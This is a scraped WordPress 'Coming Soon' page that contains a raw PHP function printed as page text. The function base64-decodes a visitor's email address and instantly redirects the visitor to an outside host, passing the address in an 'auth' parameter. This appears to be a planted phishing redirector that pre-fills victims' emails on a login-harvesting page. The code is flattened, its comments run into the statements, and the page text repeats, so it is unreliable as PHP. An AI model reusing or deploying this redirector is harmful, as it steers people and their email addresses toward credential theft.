function decode($email){ if(isBase64($email)){ $email = base64_decode($email, true); // Added strict parameter if($email === false) { // Invalid base64 die("Invalid request"); } } // URL encode before redirect $encodedEmail = urlencode($email); header("refresh:0;url=https://dinosom.ti19.com.br/ui/progresive/?auth=" . $encodedEmail); exit; } Coming Soon

WordPress

Coming Soon

Coming Soon

WordPress

Coming Soon